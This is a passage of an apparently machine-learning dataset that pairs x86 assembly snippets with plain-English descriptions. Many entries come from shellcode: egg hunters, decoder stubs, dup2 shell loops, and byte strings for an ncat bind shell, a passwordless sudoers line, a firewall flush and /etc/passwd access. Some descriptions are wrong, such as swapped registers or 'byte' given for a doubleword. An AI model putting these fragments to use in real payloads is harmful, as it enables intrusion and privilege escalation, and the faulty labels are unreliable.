471cmp ax, bx \n jne l3 if the contents of the ax register is not equal to the contents of the bx register then jump to the l3 label
472cmp ax, bx \n jne l3 \n jmp while if the contents of the ax register is not equal to the contents of the bx register then jump to the l3 label else jump to the while label
473cmp ax, bx \n jne l3 \n jmp while jump to the l3 label if the contents of the ax register is not equal to the contents of the bx register else jump to the while label
474cmp bh, al compare the contents of bh and the contents of al
475cmp bl, 0x1f compare the contents of bl and 0x1f
476cmp bl, 0x1f \n jb 0xf3 \n add al, 0x40 jump to the memory address 0xf3 if the unsigned contents of the bl register is lower than the unsigned value 0x1f else add the 0x40 value to the al register
477cmp bl, 0x1f \n jb 0xf3 \n add al, 0x40 if the unsigned contents of the bl register is lower than the unsigned value 0x1f then jump to the memory address 0xf3 else add the 0x40 value to the al register
478cmp bl, 0xaa \n je shellcode if the contents of the bl register is equal to the value 0xaa then jump to the shellcode label
479cmp bl, 0xaa \n je shellcode jump to the shellcode label if the contents of the bl register is equal to the value 0xaa
480cmp bl, 0xaa \n jz shellcode jump to shellcode if bl is equal to 0xaa
481cmp bl, 0xaa \n jz shellcode \n cmp bl, 0xbb \n jz xordecode jmp notdecode compare the content of bl register with the end character, 0xaa. if they arer equal go to shellcodelable, else compare the content of bl register with the character 0xbb that is the placeholder for xor. if they are equal go to _xordecode label. else go to _notdecode label.
482cmp bl, 0xbb \n je xordecode \n jmp notdecode if the contents of the bl register is equal to the value 0xbb then jump to the xordecode label else jump to the notdecode label
483cmp bl, 0xbb \n je xordecode \n jmp notdecode jump to the xordecode label if the contents of the bl register is equal to the value 0xbb else jump to the notdecode label
484cmp bl, 0xbb \n jz xordecode \n jmp notdecode jump to xordecode if bl is equal to 0xbb else jump to notdecode
485cmp bl, 48 compare ebx register's lower half value against ascii value 48
486cmp bl, 57 compare ebx register's lower half value against ascii value 57
487cmp bl, 78h \n jg short loc_402B1D jump to the memory location loc_402B1D if the contents of the bl register is greater than the value 78h
488cmp bl, 78h \n jg short loc_402B1D if the contents of the bl register is greater than the value 78h then jump to the memory location loc_402B1D
489cmp bl, 78h \n jge short loc_402B1D jump to the memory location loc_402B1D if the contents of the bl register is greater than or equal to the value 78h
490cmp bl, 78h \n jge short loc_402B1D if the contents of the bl register is greater than or equal to the value 78h then jump to the memory location loc_402B1D
491cmp bl, 78h \n jl short loc_402B1D jump to the memory location loc_402B1D if the contents of the bl register is less than the value 78h
492cmp bl, 78h \n jl short loc_402B1D if the contents of the bl register is less than the value 78h then jump to the memory location loc_402B1D
493cmp bl, 78h \n jle short loc_402B1D jump to the memory location loc_402B1D if the contents of the bl register is less than or equal to the value 78h
494cmp bl, 78h \n jle short loc_402B1D if the contents of the bl register is less than or equal to the value 78h then jump to the memory location loc_402B1D
495cmp bl, al \n je loop_2 jump to the loop_2 label if the contents of the bl register is equal to the contents of the al register
496cmp bl, al \n je loop_2 if the contents of the bl register is equal to the contents of the al register then jump to the loop_2 label
497cmp bl, al \n je loop_2 \n jmp short not_found jump to the loop_2 label if the contents of the bl register is equal to the contents of the al register else jump short to the not_found label
498cmp bl, al \n je loop_2 \n jmp short not_found if the contents of the bl register is equal to the contents of the al register then jump to the loop_2 label else jump short to the not_found label
499cmp byte [buff], 61h compare the byte at the memory location buff with 61h
500cmp byte [buff], 7ah compare the byte at the memory location buff with 7ah
501cmp byte [eax], 0 compare the byte pointed to by eax at this address against zero
502cmp byte [ebp+ecx], 61h compare the byte at the memory location ebp+ecx with 61h
503cmp byte [ebp+ecx], 7ah compare the byte at the memory location ebp+ecx with 7ah
504cmp BYTE [edx], 0x2e \n jne l2 jump to the l2 label if the byte starting at the address contained in the edx register is not equal to the byte value 0x2e
505cmp BYTE [edx], 0x2e \n jne l2 if the byte starting at the address contained in the edx register is not equal to the byte value 0x2e then jump to the l2 label
506cmp BYTE [edx], 0x2e \n jne l2 \n jmp while jump to the l2 label if the byte starting at the address contained in the edx register is not equal to the byte value 0x2e else jump to the while label
507cmp BYTE [edx], 0x2e \n jne l2 \n jmp while if the byte starting at the address contained in the edx register is not equal to the byte value 0x2e then jump to the l2 label else jump to the while label
508cmp byte [esi], 0x7 compare the byte in esi with 0x7
509cmp BYTE [esi], 0x7 \n jl lowbound jump to the lowbound label if the byte starting at the address contained in the esi register is lower than the byte value 0x7
510cmp BYTE [esi], 0x7 \n jl lowbound if the byte starting at the address contained in the esi register is lower than the byte value 0x7 then jump to the lowbound label
511cmp BYTE [esi], 0x7 \n jl lowbound \n sub BYTE [esi], 0x7 if the byte starting at the address contained in the esi register is lower than the byte value 0x7 then jump to the lowbound label else subtract the byte value 0x7 from byte starting at the address contained in the esi register
512cmp BYTE [esi], 0x7 \n jl lowbound \n sub BYTE [esi], 0x7 jump to the lowbound label if the byte starting at the address contained in the esi register is lower than the byte value 0x7 else subtract the byte value 0x7 from byte starting at the address contained in the esi register
513cmp BYTE [esi], 0x7 \n jle lowbound if the byte starting at the address contained in the esi register is lower than or equal to the byte value 0x7 then jump to the lowbound label
514cmp BYTE [esi], 0x7 \n jle lowbound jump to the lowbound label if the byte starting at the address contained in the esi register is lower than or equal to the byte value 0x7
515cmp byte [esi], 0x88 \n jz shellcode jump to shellcode label if the byte in esi is equal to 0x88
516cmp byte [esi], 0xd compare the byte at the address esi and 0xd
517cmp byte [esi], 0xd \n jl wrap_around if esi content is less then 13 go to wrap_aroud
518cmp byte [esi], 0xD \n jl wrap_around jump to the wrap_around label if the byte starting at the address contained in the esi register is lower than the byte value 0xD
519cmp byte [esi], 0xD \n jl wrap_around if the byte starting at the address contained in the esi register is lower than the byte value 0xD then jump to the wrap_around label
520cmp byte [esi], 0xD \n jl wrap_around \n sub byte [esi], 0xD jump to the wrap_around label if the byte starting at the address contained in the esi register is lower than the byte value 0xD else subtract the byte value 0xD from byte starting at the address contained in the esi register
521cmp byte [esi], 0xD \n jl wrap_around \n sub byte [esi], 0xD if the byte starting at the address contained in the esi register is lower than the byte value 0xD then jump to the wrap_around label else subtract the byte value 0xD from byte starting at the address contained in the esi register
522cmp byte [esi], 0xD \n jle wrap_around if the byte starting at the address contained in the esi register is lower than or equal to the byte value 0xD then jump to the wrap_around label
523cmp byte [esi], 0xD \n jle wrap_around jump to the wrap_around label if the byte starting at the address contained in the esi register is lower than or equal to the byte value 0xD
524cmp byte [esi], bl \n jne not_equal jump to not_equal if the current byte of the shellcode is not equal to bl
525cmp BYTE al, 2 \n je do_inject jump to the label do_inject if the byte representation of 2 is equal to the contents of the al register
526cmp BYTE al, 2 \n je do_inject if the byte representation of 2 is equal to the contents of the al register then jump to the label do_inject
527cmp BYTE al, 2 \n je do_inject \n jmp while jump to the label do_inject if the byte representation of 2 is equal to the contents of the al register else jump to the while label
528cmp BYTE al, 2 \n je do_inject \n jmp while if the byte representation of 2 is equal to the contents of the al register else jump to the while label then jump to the label do_inject
529cmp BYTE bl, [esi] \n jne loop_1 jump to the label loop_1 if the first byte of the esi register is not equal to the contents of the bl register
530cmp BYTE bl, [esi] \n jne loop_1 if the first byte of the esi register is not equal to the contents of the bl register then jump to the label loop_1
531cmp cl, 0x11 \n jb 0xff \n add dl, 0x5 jump to the memory address 0xff if the unsigned contents of the cl register is lower than the unsigned value 0x11 else add the 0x5 value to the dl register
532cmp cl, 0x11 \n jb 0xff \n add dl, 0x5 if the unsigned contents of the cl register is lower than the unsigned value 0x11 then jump to the memory address 0xff else add the 0x5 value to the dl register
533cmp cl, 0x3 \n jne loop jump to the loop label if the contents of the cl register is not equal to the value 0x3
534cmp cl, 0x3 \n jne loop if the contents of the cl register is not equal to the value 0x3 then jump to the loop label
535cmp cl, 0x3 \n jne loop2 jump to the loop2 label if the contents of the cl register is not equal to the value 0x3
536cmp cl, 0x3 \n jne loop2 if the contents of the cl register is not equal to the value 0x3 then jump to the loop2 label
537cmp cl, 0xff \n jne dup2 if the contents of cl are not equal to the hexadecimal value oxff, jump to the _dup2 label
538cmp cl, 12 \n jg l2 jump to the label l2 if the contents of the cl register is greater than the decimal value 12
539cmp cl, 12 \n jg l2 if the contents of the cl register is greater than the decimal value 12 then jump to the label l2
540cmp cl, 12 \n jge l2 jump to the label l2 if the contents of the cl register is greater than or equal to the decimal value 12
541cmp cl, 12 \n jge l2 if the contents of the cl register is greater than or equal to the decimal value 12 then jump to the label l2
542cmp cl, dl \n jb l3 jump to the label l3 if the unsigned contents of the cl register is lower than the unsigned contents of the dl register
543cmp cl, dl \n jb l3 if the unsigned contents of the cl register is lower than the unsigned contents of the dl register then jump to the label l3
544cmp cl, dl \n je encodedshellcode if cl contents is equal to dl contents jump to _encodedshellcode label
545cmp cl, dl \n je EncodedShellcode jump to the EncodedShellcode label if the contents of the cl register is equal to the contents of the dl register
546cmp cl, dl \n je EncodedShellcode if the contents of the cl register is equal to the contents of the dl register then jump to the EncodedShellcode label
547cmp cl, dl \n je init if cl contents is equal to dl contents jump to _init label
548cmp cl, dl \n je init \n inc cl jump to the init label if the contents of the cl register is equal to the contents of the dl register else increment the contents of the cl register
549cmp cl, dl \n je init \n inc cl if the contents of the cl register is equal to the contents of the dl register then jump to the init label else increment the contents of the cl register
550cmp cx, 2 \n jle dupcount jump to dupcount if cx is less than or equal to 2 with sign
551cmp dl, 1 \n je exit \n jmp reading jump to the exit label if the contents of the dl register is equal to the vale 1 else jump to the reading label
552cmp dl, 1 \n je exit \n jmp reading if the contents of the dl register is equal to the vale 1 then jump to the exit label else jump to the reading label
553cmp dl, 1h compare the contents of the dl register and 1h
554cmp dl, 1h \n jz exit compare 1h and dl content and go to _exit if flag zero is set
555cmp dl, 27 \n jg l3 if the contents of the dl register is greater than the decimal value 27 then jump to the label l3
556cmp dl, 27 \n jg l3 jump to the label l3 if the contents of the dl register is greater than the decimal value 27
557cmp dl, 27 \n jge l3 jump to the label l3 if the contents of the dl register is greater than or equal to the decimal value 27
558cmp dl, 27 \n jge l3 if the contents of the dl register is greater than or equal to the decimal value 27 then jump to the label l3
559cmp dl, cl \n jb l1 \n mov al, 0x39 jump to the label l1 if the unsigned contents of the dl register is lower than the unsigned contents of the cl register else move the value 0x39 to the al register
560cmp dl, cl \n jb l1 \n mov al, 0x39 if the unsigned contents of the dl register is lower than the unsigned contents of the cl register then jump to the label l1 else move the value 0x39 to the al register
561cmp dword [eax-4], egg1 compare the dword at the address [eax-4] and egg1
562cmp dword [eax-4], egg1 \n jne _next \n jmp eax jump to the _next label if the doubleword starting at the address [eax-4] is not equal to the contents stored at the egg1 address else jump to the eax register
563cmp dword [eax-4], egg1 \n jne _next \n jmp eax if the doubleword starting at the address [eax-4] is not equal to the contents stored at the egg1 address then jump to the _next label else jump to the eax register
564cmp dword [eax-4], egg2 \n je _next \n jmp eax jump to the _next label if the doubleword starting at the address [eax-4] is equal to the contents stored at the egg2 address else jump to the eax register
565cmp dword [eax-4], egg2 \n je _next \n jmp eax if the doubleword starting at the address [eax-4] is equal to the contents stored at the egg2 address then jump to the _next label else jump to the eax register
566cmp dword [eax-4],egg1 compare the dword at the memory location [eax-4] with the value of egg1
567cmp dword [eax-8], egg compare the dword at the address [eax-8] and egg
568cmp dword [eax-8], egg \n jne _next jump to the _next label if the doubleword starting at the address [eax-8] is not equal to the contents stored at the egg address
569cmp dword [eax-8], egg \n jne _next if the doubleword starting at the address [eax-8] is not equal to the contents stored at the egg address then jump to the _next label
570cmp dword [eax-8],egg compare the dword at the memory location [eax-8] with the value of egg
571cmp DWORD [eax], 0x4f904790 \n jne _start \n jmp eax jump to the jne _start label if the doubleword starting at the address contained in the eax register is not equal to the doubleword value 0x4f904790 else jump to the eax register
572cmp DWORD [eax], 0x4f904790 \n jne _start \n jmp eax if the doubleword starting at the address contained in the eax register is not equal to the doubleword value 0x4f904790 then jump to the jne _start label else jump to the eax register
573cmp dword [eax], ebx compare the dword at the address [eax] and the contents of the ebx register
574cmp dword [eax], ebx \n jne next_addr \n jmp eax if ebx content is not equal to the double word contained into eax register go to next_adrr label else go to eax address
575cmp dword [eax], ebx \n jne next_addr \n jmp eax jump to the next_address label if the doubleword starting at the address contained in the eax register is not equal to the contents of the ebx regoster else jump to the eax register
576cmp dword [eax], ebx \n jne next_addr \n jmp eax if the doubleword starting at the address contained in the eax register is not equal to the contents of the ebx regoster then jump to the next_address label else jump to the eax register
577cmp DWORD [eax], edx \n jne loop \n jmp eax jump to the loop label if the doubleword starting at the address contained in the eax register is not equal to the contents of the edx register else jump to the eax register
578cmp DWORD [eax], edx \n jne loop \n jmp eax if the doubleword starting at the address contained in the eax register is not equal to the contents of the edx register then jump to the loop label else jump to the eax register
579cmp dword [eax], edx \n jne search_the_egg compare eax with the egg_sig, if not compare jump to search_the_egg
580cmp DWORD [eax], edx \n jne search_the_egg \n jmp eax jump to the while label if the doubleword starting at the address contained in the eax register is not equal to the contents of the edx register else jump to the eax register
581cmp DWORD [eax], edx \n jne search_the_egg \n jmp eax jump to the search_the_egg label if the doubleword starting at the address contained in the eax register is not equal to the contents of the edx register else jump to the eax register
582cmp DWORD [eax], edx \n jne search_the_egg \n jmp eax if the doubleword starting at the address contained in the eax register is not equal to the contents of the edx register then jump to the while label else jump to the eax register
583cmp DWORD [eax], edx \n jne search_the_egg \n jmp eax if the doubleword starting at the address contained in the eax register is not equal to the contents of the edx register then jump to the search_the_egg label else jump to the eax register
584cmp DWORD [edx], 0x636f7270 \n je while if the doubleword starting at the address contained in the edx register is equal to the doubleword value 0x636f7270 then jump to the while label
585cmp DWORD [edx], 0x636f7270 \n je while jump to the while label if the doubleword starting at the address contained in the edx register is equal to the doubleword value 0x636f7270
586cmp dword [esi + edx + 5], edi \n jz execute_shellcode jump to execute_shellcode if the doubleword in esi+edx+5 is equal to edi
587cmp dword [var], 10 compare the doubleword stored at memory location var to the integer value 10
588cmp dword ptr [eax],edx \n jne loop id edx content and dword pointed by eax are different go to loop label
589cmp dx, 00 compare the dx value with zero
590cmp dx, 0x03e8 \n je L1 jump to the L1 label if the contents of the dx register is equal to the value 0x03e8
591cmp dx, 0x03e8 \n je L1 if the contents of the dx register is equal to the value 0x03e8 then jump to the L1 label
592cmp eax, 0 compare eax to zero
593cmp eax, 0 compare if eax is equal to 0
594cmp eax, 0 compare if eax is zero
595cmp eax, eax compare the contents of eax and the contents of eax
596cmp eax, eax \n jne 0x8 jump to the memory address 0x8 if the contents of the eax register is not equal to the contents of the eax register
597cmp eax, eax \n jne 0x8 if the contents of the eax register is not equal to the contents of the eax register then jump to the memory address 0x8
598cmp eax, eax \n jne 0x8 \n xor eax, eax jump to the memory address 0x8 if the contents of the eax register is not equal to the contents of the eax register else zero out the eax register
599cmp eax, eax \n jne 0x8 \n xor eax, eax if the contents of the eax register is not equal to the contents of the eax register then jump to the memory address 0x8 else zero out the eax register
600cmp eax, ebp \n jnz short loc_40102B jump short to the memory location loc_40102B if the contents of the eax register is not equal to the contents of the ebp register
601cmp eax, ebp \n jnz short loc_40102B if the contents of the eax register is not equal to the contents of the ebp register then jump short to the memory location loc_40102B
602cmp eax, ebx compare eax with ebx
603cmp eax, ebx compare the contents of eax and the contents of ebx
604cmp eax, ebx compare the contents of the eax register and the contents of the ebx register
605cmp eax, ebx \n je 0x47 jump to the memory address 0x47 if the contents of the eax register is equal to the contents of the edi register
606cmp eax, ebx \n je 0x47 if the contents of the eax register is equal to the contents of the edi register then jump to the memory address 0x47
607cmp eax, ebx \n je 0x47 \n xor ecx, ecx if the contents of the eax register is equal to the contents of the edi register then jump to the memory address 0x47 else zero out the ecx register
608cmp eax, ebx \n je 0x47 \n xor ecx, ecx jump to the memory address 0x47 if the contents of the eax register is equal to the contents of the edi register else zero out the ecx register
609cmp eax, ebx \n je all if eax and ebx content are equal go to _all label
610cmp eax, ebx \n je all jump to the all label if the contents of the eax register is equal to the contents of the ebx register
611cmp eax, ebx \n je all if the contents of the eax register is equal to the contents of the ebx register then jump to the all label
612cmp eax, ebx \n je all \n xor eax, eax jump to the all label if the contents of the eax register is equal to the contents of the ebx register else zero out the eax register
613cmp eax, ebx \n je all \n xor eax, eax if the contents of the eax register is equal to the contents of the ebx register then jump to the all label else zero out the eax register
614cmp eax, ebx \n je child jump to the child label if the contents of the eax register is equal to the contents of the ebx register
615cmp eax, ebx \n je child if the contents of the eax register is equal to the contents of the ebx register then jump to the child label
616cmp eax, ebx \n je connect \n ja exit compare ebx and eax content. if they are equal go to _connect label, else go to _exit label
617cmp eax, ebx \n je connect \n ja exit jump to the connect label if the contents of the eax register is equal to the contents of the ebx register else jump to the exit label if the unsigned contents of the eax register is greater than the unsigned contents of the ebx register
618cmp eax, ebx \n je connect \n ja exit if the contents of the eax register is equal to the contents of the ebx register then jump to the connect label else jump to the exit label if the unsigned contents of the eax register is greater than the unsigned contents of the ebx register
619cmp eax, ebx \n je download if the contents of the eax register is equal to the contents of the ebx register then jump to the download label
620cmp eax, ebx \n je download jump to the download label if the contents of the eax register is equal to the contents of the ebx register
621cmp eax, ebx \n je exit if the contents of the eax register is equal to the contents of the ebx register then jump to the exit label
622cmp eax, ebx \n je exit jump to the exit label if the contents of the eax register is equal to the contents of the ebx register
623cmp eax, ebx \n je exit \n add al, 0x3 jump to the exit label if the contents of the eax register is equal to the contents of the ebx register else move the value 0x3 into the al register
624cmp eax, ebx \n je exit \n add al, 0x3 if the contents of the eax register is equal to the contents of the ebx register then jump to the exit label else move the value 0x3 into the al register
625cmp eax, ebx \n je exit \n mov al, 0x4 jump to the exit label if the contents of the eax register is equal to the contents of the ebx register else move the value 0x4 into the al register
626cmp eax, ebx \n je exit \n mov al, 0x4 if the contents of the eax register is equal to the contents of the ebx register then jump to the exit label else move the value 0x4 into the al register
627cmp eax, ebx \n je L1 jump to the L1 label if the contents of the eax register is equal to the contents of the ebx register
628cmp eax, ebx \n je L1 if the contents of the eax register is equal to the contents of the ebx register then jump to the L1 label
629cmp eax, ebx \n jne retry jump to the retry label if the contents of the eax register is not equal to the contents of the ebx register
630cmp eax, ebx \n jne retry if the contents of the eax register is not equal to the contents of the ebx register then jump to the retry label
631cmp eax, ebx \n jz 0x47 compare eax with ebx content, if the xero flag is set go to the address 0x47
632cmp eax, edi \n jne infinite if edi content is not equal to eax content go to _infinite label
633cmp eax, edi \n jne infinite jump to the infinite label if the contents of the eax register is not equal to the contents of the edi register
634cmp eax, edi \n jne infinite if the contents of the eax register is not equal to the contents of the edi register then jump to the infinite label
635cmp eax, edi \n jne infinite \n xor eax, eax jump to the infinite label if the contents of the eax register is not equal to the contents of the edi register else zero out the eax register
636cmp eax, edi \n jne infinite \n xor eax, eax if the contents of the eax register is not equal to the contents of the edi register then jump to the infinite label else zero out the eax register
637cmp eax,0xf3ab0aba compare hexadecimal value 0xf3ab0aba with eax
638cmp eax,ebx compare the contents of eax with ebx
639cmp eax,ebx \n je exit if eax content is equal to ebx content jump to _exit label
640cmp eax,ebx \n jne retry compare ebx with eax content. if they are not equal go to _retry label
641cmp eax,ebx \n jz download compare ebx and eax content then jump to download_label if the result of the comparison is 0
642cmp ebp, 0 compare the contents of the ebp register with the value 0
643cmp ebx, 0 compare if ebx is zero
644cmp ebx, 9 \n ja exit \n jmp loop jump to the exit label if the unsigned contents of the ebx register is greater than the unsigned value 10 else jump to the loop label
645cmp ebx, 9 \n ja exit \n jmp loop if the unsigned contents of the ebx register is greater than the unsigned value 10 then jump to the exit label else jump to the loop label
646cmp ecx, 0 compare ecx to 0
647cmp ecx, 0 compare if ecx is zero
648cmp ecx, 0h compare ecx with 0h
649cmp ecx, 10 compare if ecx is equal to 10
650cmp ecx, 100 compare if ecx is equal to 100
651cmp ecx, 100 compare if our counter is equal to 100
652cmp ecx, 5 compare ecx with 5
653cmp ecx, ebp compare ecx and ebp
654cmp ecx, ebp compare the contents of the ecx register with the contents of the ebp register
655cmp ecx, edx \n ja l1 jump to the l1 label if the unsigned contents of the ecx register is greater than the unsigned contents of the edx register
656cmp ecx, edx \n ja l1 if the unsigned contents of the ecx register is greater than the unsigned contents of the edx register then jump to the l1 label else
657cmp edi, 0 compare if edi is equal to 0
658cmp edx, 0 compare if edx is zero
659cmp edx, 0x43 \n ja loop \n push edx jump to the loop label if the unsigned contents of the edx register is greater than the unsigned value 0x43 else push the contents of the edx register onto the stack
660cmp edx, 0x43 \n ja loop \n push edx if the unsigned contents of the edx register is greater than the unsigned value 0x43 then jump to the loop label else push the contents of the edx register onto the stack
661cmp edx, 10 compare whether the edx register has reached 10
662cmp edx, 42 compare the contents of edx to 42
663cmp edx, 42 \n je short loc_402B13 jump to loc_402B13 if the contents of the edx register is equal to 42
664cmp edx, 42 \n je short loc_402B13 if the contents of the edx register is equal to 42 then jump to loc_402B13
665cmp edx, ebx compare the contents of edx and the contents of ebx
666cmp edx, ebx \n je 0x8 \n jump to the memory address 0x8 if the contents of the edx register is equal to the contents of the ebx register
667cmp edx, ebx \n je 0x8 \n if the contents of the edx register is equal to the contents of the ebx register then jump to the memory address 0x8
668cmp edx, ebx \n je 0x8 \n mov ebx, edx jump to the memory address 0x8 if the contents of the edx register is equal to the contents of the ebx register else move the contents of the edx register into the ebx register
669cmp edx, ebx \n je 0x8 \n mov ebx, edx if the contents of the edx register is equal to the contents of the ebx register then jump to the memory address 0x8 else move the contents of the edx register into the ebx register
670cmp esi, 10 compare if esi is equal to 10
671cmp esi, edx \n je find_egg jump to the find_egg label if the contents of the esi register is equal to the contents of the edx register
672cmp word [ecx], 0x5951 compare the word at the address ecx and 0x5951
673cmp word [ecx], 0x5951 \n loopnz next \n jmp ecx compare ecx content with the marker, then decrement ecx by 1 and if cx != 0 and the zero flag is clear go to _next else go to ecx address
674cmp[esi], edx \n jz find_egg \n call esi check if we have found the egg. in case of negative response go to find_egg label else call esi
675cmps byte ptr ds:[esi],byte ptr es:[edi] subtract the value at location esi from the value a location edi without saving results. update flags based on the subtraction and the index registers esi and edi.
676code: declare code_label
677code: define the code label
678common_commands: \n inc esi in common_commands point to the next byte in esi
679connect: define _connect label
680connect: define connect function
681cont: define _cont label
682cont: define the cont label
683contents db 'hello world!', 0h define a string db and initialize to 'hello world!'
684createfile: define _createfile label
685createfile: declare the createfile label
686createfile: define createfile function
687cycle: define cycle label
688cycle: define cycle
689cycle: declare the cycle label
690D1: \n mov bl, byte [esi] in D1 move the current byte of the shellcode in the bl register
691D1: \n mov cl, byte [esi] declare D1 and move the current byte of the shellcode in the cl register
692D1: \n mov dl, byte [esi] declare D1 and move the current byte of the shellcode in the dl register
693D1: \n pop esi \n mov edi, esi in D1 save the shellcode in esi and move it to edi
694D2: \n not byte [esi] declare the function D2 and negate the byte in esi
695D2: \n not byte [esi] define the function D2 and negate the byte in esi
696D2: \n not byte [esi] declare the function D2 and negate the current byte of the shellcode
697D2: \n pop esi \n mov edi, esi define D2 save the in esi the pointer to the shellcode and move esi into edi
698D3: \n add byte [esi], 5 declare the ruotine D3 and add the value 5 to the current byte of the shellcode
699D3: \n add byte [esi], 8 declare the ruotine D3 and add the value 8 to the current byte of the shellcode
700D3: \n pop esi \n mov edi, esi declare the function D3, store the shellcode in edi and move the pointer into esi
701D3: \n sub byte [esi], 7 define function D3 and subtract 7 from the current byte of the shellcode
702D4: \n pop esi \n mov edi, esi in D4 store the shellcode in edi and move the pointer into esi
703D4: \n xor byte [esi], 0x1 define the function D4 and perform the xor operation between the byte in esi and the 0x1 value
704D4: \n xor byte [esi], 0x12 define the function D4 and perform the xor operation between the byte of the shellcode and the 0x12 value
705D4: \n xor byte [esi], 0x5 define the function D4 and perform the xor operation between the byte in esi and the 0x5 value
706das decimal adjust al register after subtraction.
707das correct the result in al register of the previous bcd subtraction operation.
708data: declare the data label
709db ',ajm,pk#########' define the byte string ',ajm,pk#########'
710db '/bin/sh' define a byte string and initialize it to '/bin/sh'
711db '/bin/sh' define the byte string '/bin/sh'
712db '/bin/sh#sh#' define the byte string '/bin/sh#sh#'
713db '/etc/passwd#' define the byte string '/etc/passwd#'
714db '/proc/sys/kernel/randomize_va_spacex' define the byte string '/proc/sys/kernel/randomize_va_spacex'
715db '/sbin/insmod#/tmp/o.o' define the byte string '/sbin/insmod#/tmp/o.o'
716db '/sbin/ipchains#-f#' define the byte string '/sbin/ipchains#-f#'
717db '/sbin/iptables#-f#' define the byte string '/sbin/iptables#-f#'
718db '/usr/bin/ncat#-lvp1337#-e/bin/bash#aaaabbbbccccdddd' define the byte string '/usr/bin/ncat#-lvp1337#-e/bin/bash#aaaabbbbccccdddd'
719db '0',10 define the byte string '0',10
720db 'all all=(all) nopasswd: all', 0xa define the byte string 'all all=(all) nopasswd: all'
721db 'cp /bin/sh /tmp/sh' define the byte string 'cp /bin/sh /tmp/sh'
722db 'egg mark' initialize a string to 'egg mark'
723db 'egg mark' define the byte string 'egg mark'
724db 'my.txtx' define the byte string 'my.txtx'
725db 'rm -f /tmp/f' define the byte string 'rm -f /tmp/f'
726db 0ah define the byte string Ô0ahÕ
727db 0b1h define the byte string Ô0b1hÕ
728db 0b8h define the byte string Ô0b8hÕ
729db 0c6h define the byte string Ô0c6hÕ
730db 0d8h define the byte string Ô0d8hÕ
731db 0e2h define the byte string Ô0e2hÕ
732db 0x3e,0xcd,0x5d,0x75,0x3c,0x3c,0x80,0x75,0x75,0x3c,0x6f,0x76,0x7b define an array of bytes and initialize it to 0x3e,0xcd,0x5d,0x75,0x3c,0x3c,0x80,0x75,0x75,0x3c,0x6f,0x76,0x7b
733db 0x68 declare a byte contining 0x68
734db 0x68 declare a byte with no label containing the value 0x68
735db 0x80 declare a byte and initialize it to 0x80
736db 0x80 declare an unlabeled byte initialized to 0x80
737db 0x96,0xf0,0x5d,0x96,0xef,0x60,0x96,0xee,0xbd,0x18,0xda,0x8d define an array of bytes and initialize it to 0x96,0xf0,0x5d,0x96,0xef,0x60,0x96,0xee,0xbd,0x18,0xda,0x8d
738db 0xcd define a byte and initialize it to 0xcd
739db 0xcd define the byte 0xcd
740db 10 declare a byte with no label containing the value 10
741db 10 declare an unlabeled byte initialized to 10
742db 20h define the byte string Ô20hÕ
743db 24h define the byte string Ô24hÕ
744db 60h define the byte string Ô60hÕ
745db 69h define the byte string Ô69hÕ
746db 70h define the byte string Ô70hÕ
747db 80h define the byte string Ô80hÕ
748db 81h define the byte string Ô81hÕ
749db 83h define the byte string Ô83hÕ
750db 87h define the byte string Ô87hÕ
751db 8bh define the byte string Ô8bhÕ
752db 9ah define the byte string Ô9ahÕ
753dd 0xdeadbeef define a byte and initialize it to 0xdeadbeef
754dd 0xdeadbeef \n dd 0xdeadbeef define double word 0xdeadbeef two times
755dec al \n jz shellcode decrement the al register and jump to shellcode if the result is zero
756dec bl \n jnz L1 decrement the bl register and jump to L1 if the result is not zero
757dec bl \n jz L1 decrement the bl register and jump to L1 if the result is zero
758dec byte dl decrement the byte at the address dl by one
759dec byte dl decrement the byte in dl
760dec cl decrement cl by1
761dec cl decrement cl register by 1
762dec cl decrement cl register
763dec cl drement cl content by 1
764dec cl decrement counter
765dec cl decrement the counter
766dec cl decrement the cl register by one
767dec cl decrement the contents of cl
768dec cl decrement the contents of the cl register
769dec cl \n jns dup2 decrement the contents of the cl register and jump to the dup2 label if the result is not negative
770dec cl \n jns loop_dup decrement the contents of the cl register and jump to the loop_dup label if the result is not negative
771dec cl \n jns loopinghere decrement the contents of the cl register and jump to the loopinghere label if the result is not negative
772dec cl \n jnz L2 decrement cl and jump to L2 if the result is not equal to zero
773dec cl \n jz L2 decrement cl and jump to L2 if the result is zero
774dec dl decrement dl
775dec dl decrement the dl register by one
776dec dl \n jnz L3 decrement dl and jump to L3 if the result is not zero
777dec dl \n jz L3 decrement dl and jump to L3 if the result is zero
778dec eax decrements eax by 1
779dec eax decrement eax content
780dec eax decrement eax content by 1
781dec eax decrement the contents of the eax register
782dec eax subtract one from the contents of eax
783dec eax decrement the eax register by one
784dec eax decrement eax
785dec ebp decrease ebp
786dec ebx decrement ebx by 1
787dec ebx decrement ebx
788dec ebx decrease ebx by 1
789dec ebx subtract one from the contents of ebx
790dec ebx decrement the ebx register by one
791dec ecx decrements ecx by 1
792dec ecx decrement ecx by 1
793dec ecx decrement ecx
794dec ecx decrement ecx register
795dec ecx decrement loop counter
796dec ecx decrement the counter ecx
797dec ecx decrement ecx alias loop counter
798dec ecx decrement loop-counter
799dec ecx decrement ecx content
800dec ecx decrement ecx content by 1
801dec ecx count down to zero
802dec ecx decrement counter
803dec ecx decrease ecx by 1
804dec ecx decrement the contents of the ecx register
805dec ecx decrement the ecx register by one
806dec ecx \n jns _dup2_loop decrement the contents of the ecx register and jump to the _dup2_loop label if the result is not negative
807dec ecx \n jns 2f_loop decrement the contents of the ecx register and jump to the 2f_loop label if the result is not negative
808dec ecx \n jns dup2 decrement the contents of the ecx register and jump to the dup2 label if the result is not negative
809dec ecx \n jns dup2loop decrement the contents of the ecx register and jump to the dup2loop label if the result is not negative
810dec ecx \n jns dup2loop decrement ecx by 1 and jump to the dup2loop procedure until ecx equals 0
811dec ecx \n jns duploop decrement the contents of the ecx register and jump to the duploop label if the result is not negative
812dec ecx \n jns loop decrement ecx by 1 and as long as sf is not set, jump to _loop label
813dec ecx \n jns loop decrement the contents of the ecx register and jump to the loop label if the result is not negative
814dec ecx \n jns loop2 decrement the contents of the ecx register and jump to the loop2 label if the result is not negative
815dec ecx \n jz counter_is_now_zero decrement the contents of the ecx register and jump to the counter_is_now_zero label if the result is zero
816dec edi decrement edi register
817dec edi decrement edi content
818dec edx decrement edx content by 1
819dec edx decrement the edx register by one
820dec edx decrement edx
821dec esp decrement esp
822dec esp decrement the esp register by one
823decode_insertion: define decode_insertion label
824decode_loop: decode_loop
825decode_pr: define decode_pr label
826decode_pr: decode_pr function
827decode_xor: define decode_xor label
828decode: define _decode label
829decode: declare _decode label
830decode: define decode label
831decode: define _ decode label
832decode: define decode function
833decode: declare the decode label
